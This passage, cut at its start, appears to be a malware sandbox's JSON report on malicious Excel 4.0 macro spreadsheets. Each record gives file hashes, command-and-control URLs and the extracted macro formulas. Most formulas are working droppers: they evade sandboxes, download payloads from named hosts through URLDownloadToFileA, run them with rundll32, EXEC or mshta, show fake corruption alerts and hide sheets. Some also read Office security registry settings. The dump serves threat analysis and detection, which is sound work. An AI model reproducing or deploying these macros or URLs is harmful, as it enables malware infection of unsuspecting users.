Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"WeovjfMsT7\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7b2dae4393677c559b4a28eb698b8ce838e2a68c6f761e3b63381ff19e11908"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7b2dae4393677c559b4a28eb698b8ce838e2a68c6f761e3b63381ff19e11908","filesize":185344,"md5":"e9a19ad5877475f51ad84af37e635a6a","sha1":"bd377b58cc1d3d8ba4f569b82f2c0afc89d4da41","sha256":"b7b2dae4393677c559b4a28eb698b8ce838e2a68c6f761e3b63381ff19e11908","sha512":"808e493402ee50c1bb4df37cfeb9a5a86cf4f8838b73a147a3e4420b7346fb65fe65b4040f8affb4d5d1cde59d7d9087868efc79701f625f6429df5db1d249a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7b2dae4393677c559b4a28eb698b8ce838e2a68c6f761e3b63381ff19e11908.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7bf1460af94aa9a71f305647f8ceb136f55b8a2b851f70c88f3f606a79c475f"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7bf1460af94aa9a71f305647f8ceb136f55b8a2b851f70c88f3f606a79c475f","filesize":167936,"md5":"5347e5a64d328b5ef8277640a605a030","sha1":"bb6eb88eb1669fe58ce81f3643c065d998dc7c5d","sha256":"b7bf1460af94aa9a71f305647f8ceb136f55b8a2b851f70c88f3f606a79c475f","sha512":"12298b872e286a11a1ccce5090b1f63dfbc083834d715959fbaf27911d104536c4c8ab3a748a5b5e1634e4853ee37187de39b64a7514c874eff62c47910b0c2c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7bf1460af94aa9a71f305647f8ceb136f55b8a2b851f70c88f3f606a79c475f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HKuAkszZtB\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7d43e399723937a40e36621d7dde4fee0f1f1b907a6975f4e5674e03c8d28f3"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7d43e399723937a40e36621d7dde4fee0f1f1b907a6975f4e5674e03c8d28f3","filesize":185344,"md5":"5c347570f1ff39d05877db04da43c78f","sha1":"f7a9ba72b4c206d64966948c83c91e212c40f922","sha256":"b7d43e399723937a40e36621d7dde4fee0f1f1b907a6975f4e5674e03c8d28f3","sha512":"9d6d49d4207ac893f945378468c1a9b2fe7af4287dac7d49515d49c0a0af725eb8e9b328ea64cc390879fbd758c6db0eb842c6a14fd7c8c39d0de76478f28f8c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7d43e399723937a40e36621d7dde4fee0f1f1b907a6975f4e5674e03c8d28f3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7e2f6b1a80b9641413aad2ef661cdd25da4905973697c146c7ffbd94f7fd57e"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7e2f6b1a80b9641413aad2ef661cdd25da4905973697c146c7ffbd94f7fd57e","filesize":112128,"md5":"14fb1dad6b1ee47a6959e3966c41679c","sha1":"bbcd645a581df81d7879cbbfc1d134ec6ede9e00","sha256":"b7e2f6b1a80b9641413aad2ef661cdd25da4905973697c146c7ffbd94f7fd57e","sha512":"e19b837261461bbdeb5fe85803bbcf29e261db2adc494d601257715adb2c5811484e0d729b5b7c3da2a94d32ded4f38251fe3f90946c8dc1bb423b019aee2515","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7e2f6b1a80b9641413aad2ef661cdd25da4905973697c146c7ffbd94f7fd57e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b7f70eefdab5aea0fb88cdca51f67d396d8eb96d31170f4f945439224f4c67f9"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b7f70eefdab5aea0fb88cdca51f67d396d8eb96d31170f4f945439224f4c67f9","filesize":104448,"md5":"a5316bc39fecec41f98227a1ea029b2e","sha1":"af6777fa9e7cd0856677857a4c1f5e9f1339af47","sha256":"b7f70eefdab5aea0fb88cdca51f67d396d8eb96d31170f4f945439224f4c67f9","sha512":"a638b88a77878571d6c8641fe3a7325524620afcf4f4f2000492cdbc4c269d0d394e85d2ba45ed875f5e759ae79b23cab730b2d1ed567ecb4cdc3966489b864c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b7f70eefdab5aea0fb88cdca51f67d396d8eb96d31170f4f945439224f4c67f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"1IgiTDnrqm\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b802d4fad5690a7a7a7bfe9571d43e594d3177c488fb2bf51d12cad945f238ec"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b802d4fad5690a7a7a7bfe9571d43e594d3177c488fb2bf51d12cad945f238ec","filesize":170496,"md5":"326be13f2560ae5b55fc35dbc1039888","sha1":"31b68c885af7168811578296d0b5a7703908bfb1","sha256":"b802d4fad5690a7a7a7bfe9571d43e594d3177c488fb2bf51d12cad945f238ec","sha512":"1d83fa7220d80ba254b6b4cf735d8262a44d7f9c33bef5fbc09af76f5e08cdb14ec5eb189255854d12824133f6aaeb1dab23017263aca95791a30ba583c775cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b802d4fad5690a7a7a7bfe9571d43e594d3177c488fb2bf51d12cad945f238ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YVLAlZhzMY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b81c87098a9616a646bd27e0c8be80caa1d258c36a6d838d17f99b934acccb63"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b81c87098a9616a646bd27e0c8be80caa1d258c36a6d838d17f99b934acccb63","filesize":185344,"md5":"b26de740daff7e5f456366a93df97ac8","sha1":"e9eae690632e0ef924c3ee7364bb128f8ef502bc","sha256":"b81c87098a9616a646bd27e0c8be80caa1d258c36a6d838d17f99b934acccb63","sha512":"e56e44b453625fa251e2268963a3252b9341f9bcac16f597f6164891e244d4247f732814fab197f6a263b2fbe1aeacd29e60b644dd382fceb5051542f1a7917f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b81c87098a9616a646bd27e0c8be80caa1d258c36a6d838d17f99b934acccb63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b8657ca4cd2b1dfa6f7d86d476b9ec78b4169f8a46672130bb62179951f02f45"},"analysis":{"reported":"2020-04-09T16:18:31Z","score":10},"files":[{"filename":"b8657ca4cd2b1dfa6f7d86d476b9ec78b4169f8a46672130bb62179951f02f45","filesize":167936,"md5":"cc9ce85b0891568e70f8602aa31c8681","sha1":"d14a0a53f493d8eeec7784a8c3126dc81e5f5fc6","sha256":"b8657ca4cd2b1dfa6f7d86d476b9ec78b4169f8a46672130bb62179951f02f45","sha512":"7831a9580cae53197365166479ff731ae114c514985ab3610f3b835b2626e8b07d35e0c2ab64374a2824cef15cdf94fb327d6fd45844aa73c230506af9518c49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b8657ca4cd2b1dfa6f7d86d476b9ec78b4169f8a46672130bb62179951f02f45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NAvQgv4nqe\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b890fb052287b1e2a74b607cc74582f9f5015c50738538b1dd3819a501073d33"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b890fb052287b1e2a74b607cc74582f9f5015c50738538b1dd3819a501073d33","filesize":170496,"md5":"58472457572531d6c491520e177bf2fc","sha1":"6f8df139b7cb970252699f5d397f6ed52e9eb7ee","sha256":"b890fb052287b1e2a74b607cc74582f9f5015c50738538b1dd3819a501073d33","sha512":"c06a3aa770f20654548982f1b0936d4d643559accb4d71ff00721f4f7ec678349d837c40149d3ae2325e36a929e1eb203900ec5fd6c8115fee540a3ba1a652b3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b890fb052287b1e2a74b607cc74582f9f5015c50738538b1dd3819a501073d33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"nkGLK3vXx7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b89909836472b17981536bb40f6520dd97e3a44b8df4b1096f04863b7e1dbc79"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b89909836472b17981536bb40f6520dd97e3a44b8df4b1096f04863b7e1dbc79","filesize":136192,"md5":"49ac2022f79b9cf1bf78078c87efc12c","sha1":"f14d6551f79e3b9bd92a5f9314ee9a8ccc3babc4","sha256":"b89909836472b17981536bb40f6520dd97e3a44b8df4b1096f04863b7e1dbc79","sha512":"882433626f457d4fbe169af3d8b607b1c25c7b1b423f1fd920edc4a37facda6a3a1cb53b91e1e73899e32149612c95a42ca67f1d99a6229ce69e5a8907ea1201","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b89909836472b17981536bb40f6520dd97e3a44b8df4b1096f04863b7e1dbc79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d2EVqvmKDo\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b89cbf2740eb6a24ba5ed5f397d966979ab733678e21d14520ba025f946cc007"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b89cbf2740eb6a24ba5ed5f397d966979ab733678e21d14520ba025f946cc007","filesize":206336,"md5":"08f1863255d17d9d2e403dd2d8fd58ed","sha1":"9c01f887efe4dc481eae23f5e30f21b47c31af3c","sha256":"b89cbf2740eb6a24ba5ed5f397d966979ab733678e21d14520ba025f946cc007","sha512":"75f51395ef5cf8d8bbc338d741c3e6bde78feb80ec49e8ecab1bf34e4f53867a776893a34dbacc1b568f46d1dad8c6fd379094d0ae270098ffba9c9adf24afa5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b89cbf2740eb6a24ba5ed5f397d966979ab733678e21d14520ba025f946cc007.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y72rN57R2P\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b89de50c0713aed7f5512a5500ed08538ca7fd7dda15d804c5b222fbab809190"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b89de50c0713aed7f5512a5500ed08538ca7fd7dda15d804c5b222fbab809190","filesize":185344,"md5":"cd8bd7ff488b3614428e7c0c104ff672","sha1":"5cee3fa125b3f38dc2b95dcc1993bd29de8e2717","sha256":"b89de50c0713aed7f5512a5500ed08538ca7fd7dda15d804c5b222fbab809190","sha512":"74cbd84241d3fa6eb6940eb8a32a1346477cd075f4eda2ca16295a598223d84cb358725ead63570e20ede8c39db11acfdecb496445d723881660a4b5143d24cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b89de50c0713aed7f5512a5500ed08538ca7fd7dda15d804c5b222fbab809190.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b8c2001004ad94e81f978a4b7442032ce07dac67c729bbbb5deb77958cad71e3"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b8c2001004ad94e81f978a4b7442032ce07dac67c729bbbb5deb77958cad71e3","filesize":152576,"md5":"8c733220677f1b9c99e810ab7e75cce4","sha1":"bb14314bff8a6acddb6b4f958b22b0898a74380e","sha256":"b8c2001004ad94e81f978a4b7442032ce07dac67c729bbbb5deb77958cad71e3","sha512":"d262d5d4af3e76d6bfe6fc4b7c916b3d5ed3dc9c32cfd3ccc196096cdb4f05dd2c6b77cdd995cc5e1f6329872d4f644a6a228dd1a9cbe41a9c1a8dcdc2485039","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b8c2001004ad94e81f978a4b7442032ce07dac67c729bbbb5deb77958cad71e3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Rbl8dtDwUU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b8c7fcf09e3ad384a2384e84bdf19a18c2c1055237fd2d0a253a78b9bf9139d6"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b8c7fcf09e3ad384a2384e84bdf19a18c2c1055237fd2d0a253a78b9bf9139d6","filesize":193024,"md5":"977d5c2d8537da5b521b46ba37453273","sha1":"06f1b57bcd5119cdde5f60c32f782550abc71f18","sha256":"b8c7fcf09e3ad384a2384e84bdf19a18c2c1055237fd2d0a253a78b9bf9139d6","sha512":"4d095f998415d968125600be304aae71c6bccc9dab38ed4c2ae416faa212587383b99ea30bce3955aea2eab5bf3e58f29874661d2cbc23503053556af52e038e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b8c7fcf09e3ad384a2384e84bdf19a18c2c1055237fd2d0a253a78b9bf9139d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/xw1JvTnc\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b8ed45fd4a92b1ffb9381a63cc595e7c8d0912eecc98d4029ff022b6785752cc"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b8ed45fd4a92b1ffb9381a63cc595e7c8d0912eecc98d4029ff022b6785752cc","filesize":219136,"md5":"fca0b07082857651c95f3ec9c91d2e65","sha1":"ff39e8867baa20eb18c05e0d8f0bea049f6e14c8","sha256":"b8ed45fd4a92b1ffb9381a63cc595e7c8d0912eecc98d4029ff022b6785752cc","sha512":"e1efb90312989a359d1b74ec5c422021d24b4b87aa233467253033fb0b6b4bdc124d50ef7a7d5fab9a4d9d926300156f28664b355ff83ed97ff22c63507f589f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b8ed45fd4a92b1ffb9381a63cc595e7c8d0912eecc98d4029ff022b6785752cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lysKkVM144\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b8f1f69f865eab24bf7d09f748ddf665735cc3d0b41547a3f1093d7f46136152"},"analysis":{"reported":"2020-04-09T16:18:32Z","score":10},"files":[{"filename":"b8f1f69f865eab24bf7d09f748ddf665735cc3d0b41547a3f1093d7f46136152","filesize":112640,"md5":"5a4ab53d5b78abc203c3a538688df96d","sha1":"ef55cbc0e45e00b9c2967770c49a2ec8c5e5b910","sha256":"b8f1f69f865eab24bf7d09f748ddf665735cc3d0b41547a3f1093d7f46136152","sha512":"3d6914d5c95eeb49b994aff14d3bb433c99932135eba7f45e089f0a226480bad083bcaf6be7feb1f5ad2c5418d2c38d6883c88954aba6524dae8e3a962616ed6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b8f1f69f865eab24bf7d09f748ddf665735cc3d0b41547a3f1093d7f46136152.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
